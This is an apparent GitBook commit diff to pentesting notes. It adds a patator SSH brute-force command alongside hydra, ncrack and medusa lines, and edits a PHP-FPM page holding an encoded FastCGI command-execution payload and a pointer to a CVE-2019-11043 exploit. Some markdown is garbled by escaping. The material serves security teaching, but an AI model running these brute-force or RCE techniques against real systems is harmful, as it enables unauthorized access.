GitBook: [master] 6 pages and 12 assets modified
Before Width: | Height: | Size: 341 KiB After Width: | Height: | Size: 341 KiB |
Before Width: | Height: | Size: 341 KiB After Width: | Height: | Size: 341 KiB |
Before Width: | Height: | Size: 10 KiB After Width: | Height: | Size: 10 KiB |
Before Width: | Height: | Size: 10 KiB After Width: | Height: | Size: 10 KiB |
Before Width: | Height: | Size: 35 KiB After Width: | Height: | Size: 35 KiB |
Before Width: | Height: | Size: 1.3 MiB After Width: | Height: | Size: 1.3 MiB |
|
@ -367,6 +367,7 @@ msf> use auxiliary/scanner/mssql/mssql_login #Be carefull, you can block account
|
||||||
hydra -l root -P passwords.txt [-t 32] <IP> ssh
|
hydra -l root -P passwords.txt [-t 32] <IP> ssh
|
||||||
ncrack -p 22 --user root -P passwords.txt <IP> [-T 5]
|
ncrack -p 22 --user root -P passwords.txt <IP> [-T 5]
|
||||||
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ssh
|
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ssh
|
||||||
|
patator ssh_login host=<ip> port=22 user=root 0=/path/passwords.txt password=FILE0 -x ignore:mesg='Authentication failed'
|
||||||
```
|
```
|
||||||
|
|
||||||
### Telnet
|
### Telnet
|
||||||
|
|
|
@ -130,7 +130,7 @@ The files in the folder WPDNSE are a copy of the original ones, then won't survi
|
||||||
|
|
||||||
Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced \(search for `Section start`\).
|
Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced \(search for `Section start`\).
|
||||||
|
|
||||||
![](../../../.gitbook/assets/image%20%28477%29%20%282%29%20%282%29%20%282%29%20%281%29.png)
|
![](../../../.gitbook/assets/image%20%28477%29%20%282%29%20%282%29%20%282%29%20%282%29%20%281%29.png)
|
||||||
|
|
||||||
### USB Detective
|
### USB Detective
|
||||||
|
|
||||||
|
|
|
@ -601,7 +601,7 @@ Many apps log informative \(and potentially sensitive\) messages to the console
|
||||||
5. Reproduce the problem.
|
5. Reproduce the problem.
|
||||||
6. Click on the **Open Console** button located in the upper right-hand area of the Devices window to view the console logs on a separate window.
|
6. Click on the **Open Console** button located in the upper right-hand area of the Devices window to view the console logs on a separate window.
|
||||||
|
|
||||||
![](../../.gitbook/assets/image%20%28466%29%20%282%29%20%282%29%20%282%29%20%281%29.png)
|
![](../../.gitbook/assets/image%20%28466%29%20%282%29%20%282%29%20%282%29%20%282%29%20%281%29.png)
|
||||||
|
|
||||||
You can also connect to the device shell as explained in Accessing the Device Shell, install **socat** via **apt-get** and run the following command:
|
You can also connect to the device shell as explained in Accessing the Device Shell, install **socat** via **apt-get** and run the following command:
|
||||||
|
|
||||||
|
|
|
@ -6,7 +6,7 @@
|
||||||
|
|
||||||
## Attacks Graphic
|
## Attacks Graphic
|
||||||
|
|
||||||
![](../../.gitbook/assets/image%20%28554%29.png)
|
![](../../.gitbook/assets/image%20%28535%29%20%281%29.png)
|
||||||
|
|
||||||
## Tool
|
## Tool
|
||||||
|
|
||||||
|
|
|
@ -15,6 +15,7 @@ PORT STATE SERVICE
|
||||||
## Enumeration
|
## Enumeration
|
||||||
|
|
||||||
### Nmap FTP scripts
|
### Nmap FTP scripts
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
nmap --script ftp-* -p 21 <ip>
|
nmap --script ftp-* -p 21 <ip>
|
||||||
```
|
```
|
||||||
|
|
|
@ -13,7 +13,7 @@ Normally web pages, files and all of the documents which are transferred from th
|
||||||
|
|
||||||
If **CGI** is installed on the server, the specific cgi-bin directory is also added there, for example home/user/public\_html/cgi-bin. CGI scripts are stored in this directory. **Each file in the directory is treated as an executable program**. When accessing a script from the directory, the server sends request to the application, responsible for this script, instead of sending file's content to the browser. **After the input data processing is completed, the application sends the output data** to the web server which forwards the data to the HTTP client.
|
If **CGI** is installed on the server, the specific cgi-bin directory is also added there, for example home/user/public\_html/cgi-bin. CGI scripts are stored in this directory. **Each file in the directory is treated as an executable program**. When accessing a script from the directory, the server sends request to the application, responsible for this script, instead of sending file's content to the browser. **After the input data processing is completed, the application sends the output data** to the web server which forwards the data to the HTTP client.
|
||||||
|
|
||||||
For example, when the CGI script http://mysitename.com/**cgi-bin/file.pl** is accessed, the server will run the appropriate Perl application through CGI. The data generated from script execution will be sent by the application to the web server. The server, on the other hand, will transfer data to the browser. If the server did not have CGI, the browser would have displayed the **.pl** file code itself. \(explanation from [here](https://help.superhosting.bg/en/cgi-common-gateway-interface-fastcgi.html)\)
|
For example, when the CGI script [http://mysitename.com/\*\*cgi-bin/file.pl\*\*](http://mysitename.com/**cgi-bin/file.pl**) is accessed, the server will run the appropriate Perl application through CGI. The data generated from script execution will be sent by the application to the web server. The server, on the other hand, will transfer data to the browser. If the server did not have CGI, the browser would have displayed the **.pl** file code itself. \(explanation from [here](https://help.superhosting.bg/en/cgi-common-gateway-interface-fastcgi.html)\)
|
||||||
|
|
||||||
### FastCGI
|
### FastCGI
|
||||||
|
|
||||||
|
@ -21,10 +21,6 @@ For example, when the CGI script http://mysitename.com/**cgi-bin/file.pl** is ac
|
||||||
|
|
||||||
The need to develop FastCGI is that Web was arisen by applications' rapid development and complexity, as well to address the scalability shortcomings of CGI technology. To meet those requirements [Open Market](http://en.wikipedia.org/wiki/Open_Market) introduced **FastCGI – a high performance version of the CGI technology with enhanced capabilities.**
|
The need to develop FastCGI is that Web was arisen by applications' rapid development and complexity, as well to address the scalability shortcomings of CGI technology. To meet those requirements [Open Market](http://en.wikipedia.org/wiki/Open_Market) introduced **FastCGI – a high performance version of the CGI technology with enhanced capabilities.**
|
||||||
|
|
||||||
## RCE \(7.\[123\].x\)
|
|
||||||
|
|
||||||
This [**metasploit module**](https://www.rapid7.com/db/modules/exploit/multi/http/php_fpm_rce/) exploits an underflow vulnerability in versions 7.1.x below 7.1.33, 7.2.x below 7.2.24 and 7.3.x below 7.3.11 of **PHP-FPM on Nginx**.
|
|
||||||
|
|
||||||
## disable\_functions bypass
|
## disable\_functions bypass
|
||||||
|
|
||||||
It's possible to run PHP code abusing the FastCGI and avoiding the `disable_functions` limitations.
|
It's possible to run PHP code abusing the FastCGI and avoiding the `disable_functions` limitations.
|
||||||
|
@ -32,14 +28,14 @@ It's possible to run PHP code abusing the FastCGI and avoiding the `disable_func
|
||||||
### Via Gopherus
|
### Via Gopherus
|
||||||
|
|
||||||
{% hint style="danger" %}
|
{% hint style="danger" %}
|
||||||
I'm not sure if this is working in modern versions because I tried once and it didn't execute anything. Please, if you have more information about this contact me via ****[**PEASS & HackTricks telegram group here**](https://t.me/peass), or twitter [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
I'm not sure if this is working in modern versions because I tried once and it didn't execute anything. Please, if you have more information about this contact me via **\*\*\[**PEASS & HackTricks telegram group here**\]\(**[https://t.me/peass](https://t.me/peass)**\), or twitter \[**@carlospolopm**\]\(**[https://twitter.com/carlospolopm](https://twitter.com/carlospolopm)**\)**.\*\*
|
||||||
{% endhint %}
|
{% endhint %}
|
||||||
|
|
||||||
Using [Gopherus](https://github.com/tarunkant/Gopherus) you can generate a payload to send to the FastCGI listener and execute arbitrary commands:
|
Using [Gopherus](https://github.com/tarunkant/Gopherus) you can generate a payload to send to the FastCGI listener and execute arbitrary commands:
|
||||||
|
|
||||||
![](../../../../.gitbook/assets/image%20%28385%29.png)
|
![](../../../../.gitbook/assets/image%20%28385%29.png)
|
||||||
|
|
||||||
Then, you can grab the urlencoded payload and decode it and transform to base64, [**using this recipe of cyberchef for example**](http://icyberchef.com/#recipe=URL_Decode%28%29To_Base64%28'A-Za-z0-9%2B/%3D'%29&input=JTAxJTAxJTAwJTAxJTAwJTA4JTAwJTAwJTAwJTAxJTAwJTAwJTAwJTAwJTAwJTAwJTAxJTA0JTAwJTAxJTAxJTA0JTA0JTAwJTBGJTEwU0VSVkVSX1NPRlRXQVJFZ28lMjAvJTIwZmNnaWNsaWVudCUyMCUwQiUwOVJFTU9URV9BRERSMTI3LjAuMC4xJTBGJTA4U0VSVkVSX1BST1RPQ09MSFRUUC8xLjElMEUlMDJDT05URU5UX0xFTkdUSDc2JTBFJTA0UkVRVUVTVF9NRVRIT0RQT1NUJTA5S1BIUF9WQUxVRWFsbG93X3VybF9pbmNsdWRlJTIwJTNEJTIwT24lMEFkaXNhYmxlX2Z1bmN0aW9ucyUyMCUzRCUyMCUwQWF1dG9fcHJlcGVuZF9maWxlJTIwJTNEJTIwcGhwJTNBLy9pbnB1dCUwRiUxN1NDUklQVF9GSUxFTkFNRS92YXIvd3d3L2h0bWwvaW5kZXgucGhwJTBEJTAxRE9DVU1FTlRfUk9PVC8lMDAlMDAlMDAlMDAlMDElMDQlMDAlMDElMDAlMDAlMDAlMDAlMDElMDUlMDAlMDElMDBMJTA0JTAwJTNDJTNGcGhwJTIwc3lzdGVtJTI4JTI3d2hvYW1pJTIwJTNFJTIwL3RtcC93aG9hbWkudHh0JTI3JTI5JTNCZGllJTI4JTI3LS0tLS1NYWRlLWJ5LVNweUQzci0tLS0tJTBBJTI3JTI5JTNCJTNGJTNFJTAwJTAwJTAwJTAw). And then copy/pasting the abse64 in this php code:
|
Then, you can grab the urlencoded payload and decode it and transform to base64, \[**using this recipe of cyberchef for example**\]\([http://icyberchef.com/\#recipe=URL\_Decode%28%29To\_Base64%28'A-Za-z0-9%2B/%3D'%29&input=JTAxJTAxJTAwJTAxJTAwJTA4JTAwJTAwJTAwJTAxJTAwJTAwJTAwJTAwJTAwJTAwJTAxJTA0JTAwJTAxJTAxJTA0JTA0JTAwJTBGJTEwU0VSVkVSX1NPRlRXQVJFZ28lMjAvJTIwZmNnaWNsaWVudCUyMCUwQiUwOVJFTU9URV9BRERSMTI3LjAuMC4xJTBGJTA4U0VSVkVSX1BST1RPQ09MSFRUUC8xLjElMEUlMDJDT05URU5UX0xFTkdUSDc2JTBFJTA0UkVRVUVTVF9NRVRIT0RQT1NUJTA5S1BIUF9WQUxVRWFsbG93X3VybF9pbmNsdWRlJTIwJTNEJTIwT24lMEFkaXNhYmxlX2Z1bmN0aW9ucyUyMCUzRCUyMCUwQWF1dG9fcHJlcGVuZF9maWxlJTIwJTNEJTIwcGhwJTNBLy9pbnB1dCUwRiUxN1NDUklQVF9GSUxFTkFNRS92YXIvd3d3L2h0bWwvaW5kZXgucGhwJTBEJTAxRE9DVU1FTlRfUk9PVC8lMDAlMDAlMDAlMDAlMDElMDQlMDAlMDElMDAlMDAlMDAlMDAlMDElMDUlMDAlMDElMDBMJTA0JTAwJTNDJTNGcGhwJTIwc3lzdGVtJTI4JTI3d2hvYW1pJTIwJTNFJTIwL3RtcC93aG9hbWkudHh0JTI3JTI5JTNCZGllJTI4JTI3LS0tLS1NYWRlLWJ5LVNweUQzci0tLS0tJTBBJTI3JTI5JTNCJTNGJTNFJTAwJTAwJTAwJTAw](http://icyberchef.com/#recipe=URL_Decode%28%29To_Base64%28'A-Za-z0-9%2B/%3D'%29&input=JTAxJTAxJTAwJTAxJTAwJTA4JTAwJTAwJTAwJTAxJTAwJTAwJTAwJTAwJTAwJTAwJTAxJTA0JTAwJTAxJTAxJTA0JTA0JTAwJTBGJTEwU0VSVkVSX1NPRlRXQVJFZ28lMjAvJTIwZmNnaWNsaWVudCUyMCUwQiUwOVJFTU9URV9BRERSMTI3LjAuMC4xJTBGJTA4U0VSVkVSX1BST1RPQ09MSFRUUC8xLjElMEUlMDJDT05URU5UX0xFTkdUSDc2JTBFJTA0UkVRVUVTVF9NRVRIT0RQT1NUJTA5S1BIUF9WQUxVRWFsbG93X3VybF9pbmNsdWRlJTIwJTNEJTIwT24lMEFkaXNhYmxlX2Z1bmN0aW9ucyUyMCUzRCUyMCUwQWF1dG9fcHJlcGVuZF9maWxlJTIwJTNEJTIwcGhwJTNBLy9pbnB1dCUwRiUxN1NDUklQVF9GSUxFTkFNRS92YXIvd3d3L2h0bWwvaW5kZXgucGhwJTBEJTAxRE9DVU1FTlRfUk9PVC8lMDAlMDAlMDAlMDAlMDElMDQlMDAlMDElMDAlMDAlMDAlMDAlMDElMDUlMDAlMDElMDBMJTA0JTAwJTNDJTNGcGhwJTIwc3lzdGVtJTI4JTI3d2hvYW1pJTIwJTNFJTIwL3RtcC93aG9hbWkudHh0JTI3JTI5JTNCZGllJTI4JTI3LS0tLS1NYWRlLWJ5LVNweUQzci0tLS0tJTBBJTI3JTI5JTNCJTNGJTNFJTAwJTAwJTAwJTAw)\). And then copy/pasting the abse64 in this php code:
|
||||||
|
|
||||||
```php
|
```php
|
||||||
<?php
|
<?php
|
||||||
|
@ -51,7 +47,7 @@ Uploading and accessing this script the exploit is going to be sent to FastCGI \
|
||||||
### PHP exploit
|
### PHP exploit
|
||||||
|
|
||||||
{% hint style="danger" %}
|
{% hint style="danger" %}
|
||||||
I'm not sure if this is working in modern versions because I tried once and I couldn't execute anything. Actually I managed to see that `phpinfo()` from FastCGI execution indicated that `disable_functions` was empty, but PHP \(somehow\) was still preventing me from executing any previously disabled function. Please, if you have more information about this contact me via ****[**PEASS & HackTricks telegram group here**](https://t.me/peass), or twitter [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
I'm not sure if this is working in modern versions because I tried once and I couldn't execute anything. Actually I managed to see that `phpinfo()` from FastCGI execution indicated that `disable_functions` was empty, but PHP \(somehow\) was still preventing me from executing any previously disabled function. Please, if you have more information about this contact me via **\*\*\[**PEASS & HackTricks telegram group here**\]\(**[https://t.me/peass](https://t.me/peass)**\), or twitter \[**@carlospolopm**\]\(**[https://twitter.com/carlospolopm](https://twitter.com/carlospolopm)**\)**.\*\*
|
||||||
{% endhint %}
|
{% endhint %}
|
||||||
|
|
||||||
```php
|
```php
|
||||||
|
@ -435,5 +431,3 @@ You will find that the exploit is very similar to the previous code, but instead
|
||||||
You can exploit this vulnerability with [**phuip-fpizdam**](https://github.com/neex/phuip-fpizdam) and test is using this docker environment: [https://github.com/vulhub/vulhub/tree/master/php/CVE-2019-11043](https://github.com/vulhub/vulhub/tree/master/php/CVE-2019-11043).
|
You can exploit this vulnerability with [**phuip-fpizdam**](https://github.com/neex/phuip-fpizdam) and test is using this docker environment: [https://github.com/vulhub/vulhub/tree/master/php/CVE-2019-11043](https://github.com/vulhub/vulhub/tree/master/php/CVE-2019-11043).
|
||||||
You can also find an analysis of the vulnerability [**here**](https://medium.com/@knownsec404team/php-fpm-remote-code-execution-vulnerability-cve-2019-11043-analysis-35fd605dd2dc)**.**
|
You can also find an analysis of the vulnerability [**here**](https://medium.com/@knownsec404team/php-fpm-remote-code-execution-vulnerability-cve-2019-11043-analysis-35fd605dd2dc)**.**
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|